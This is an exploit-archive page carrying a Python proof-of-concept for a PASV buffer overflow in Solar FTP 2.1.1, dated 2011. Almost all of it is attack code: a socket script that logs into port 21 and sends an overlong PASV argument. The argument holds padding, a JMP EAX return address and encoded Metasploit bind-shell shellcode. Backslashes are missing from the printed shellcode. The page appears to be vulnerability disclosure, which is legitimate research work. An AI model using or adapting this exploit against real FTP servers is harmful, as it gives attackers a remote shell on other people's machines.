Home / exploits Solar FTP 2.1.1 PASV Buffer Overflow
Posted on 13 July 2011
#!/usr/bin/python #Title: Solar FTP 2.1.1 PASV Command PoC #Authors: Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg) #Tested: Windows XP SP3 #Vendor Contacted July 11, 2011 #Vendor Response: July 12, 2011 - Will fix ASAP, approved release of PoC. #Notes: We found different offsets depending on the subnet that the server was running on. #This particular exploit was run with the server running on 192.168.133.128. If you test this exploit and the #app just crashes instead of running the shellcode, pass the exeptions through your debugger and after #about 5 of them, you'll see EIP overwritten. If you can figure out why these offsets change, more power to you! #We found the most consistent behavior using a total buffer of about 2127 bytes. import socket,sys,time,struct if len(sys.argv) < 2: print "[-]Usage: %s <target addr> " % sys.argv[0] sys.exit(0) target = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] #./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b 'x00' #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shellcode = ("xd9xcfxbex41xb0x13xe9xd9x74x24xf4x5fx29xc9" "xb1x56x31x77x18x03x77x18x83xc7x45x52xe6x15" "xadx1bx09xe6x2dx7cx83x03x1cxaexf7x40x0cx7e" "x73x04xbcxf5xd1xbdx37x7bxfexb2xf0x36xd8xfd" "x01xf7xe4x52xc1x99x98xa8x15x7axa0x62x68x7b" "xe5x9fx82x29xbexd4x30xdexcbxa9x88xdfx1bxa6" "xb0xa7x1ex79x44x12x20xaaxf4x29x6ax52x7fx75" "x4bx63xacx65xb7x2axd9x5ex43xadx0bxafxacx9f" "x73x7cx93x2fx7ex7cxd3x88x60x0bx2fxebx1dx0c" "xf4x91xf9x99xe9x32x8ax3axcaxc3x5fxdcx99xc8" "x14xaaxc6xccxabx7fx7dxe8x20x7ex52x78x72xa5" "x76x20x21xc4x2fx8cx84xf9x30x68x79x5cx3ax9b" "x6exe6x61xf4x43xd5x99x04xcbx6exe9x36x54xc5" "x65x7bx1dxc3x72x7cx34xb3xedx83xb6xc4x24x40" "xe2x94x5ex61x8ax7ex9fx8ex5fxd0xcfx20x0fx91" "xbfx80xffx79xaax0ex20x99xd5xc4x57x9dx1bx3c" "x34x4ax5exc2xabxd6xd7x24xa1xf6xb1xffx5dx35" "xe6x37xfax46xccx6bx53xd1x58x62x63xdex58xa0" "xc0x73xf0x23x92x9fxc5x52xa5xb5x6dx1cx9ex5e" "xe7x70x6dxfexf8x58x05x63x6ax07xd5xeax97x90" "x82xbbx66xe9x46x56xd0x43x74xabx84xacx3cx70" "x75x32xbdxf5xc1x10xadxc3xcax1cx99x9bx9cxca" "x77x5ax77xbdx21x34x24x17xa5xc1x06xa8xb3xcd" "x42x5ex5bx7fx3bx27x64xb0xabxafx1dxacx4bx4f" "xf4x74x7bx1ax54xdcx14xc3x0dx5cx79xf4xf8xa3" "x84x77x08x5cx73x67x79x59x3fx2fx92x13x50xda" "x94x80x51xcf") #7C9572D8 JMP EAX ret = struct.pack('<L', 0x7C9572D8) #works when the server is on 192.168.133.128 padding = "x43" * 100 junk = "x43" * (1900 - len(shellcode)) frontpad = "x41" * 100 + "xebx30" + "x41" * 21 crash = frontpad + ret + padding + shellcode + junk print "\n[*] Solar FTP 2.1.1 PASV Exploit \n[*] Authors: Craig Freyman (@cd1zz) and Gerardo Iglesias (@iglesiasgg) \n[*] Connecting to "+target s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,21)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[*] Sending " + `len(crash)` + " byte PASV crash..." s.send("USER test ") s.recv(1024) s.send("PASS test ") s.recv(1024) s.send("PASV " + crash + " ")
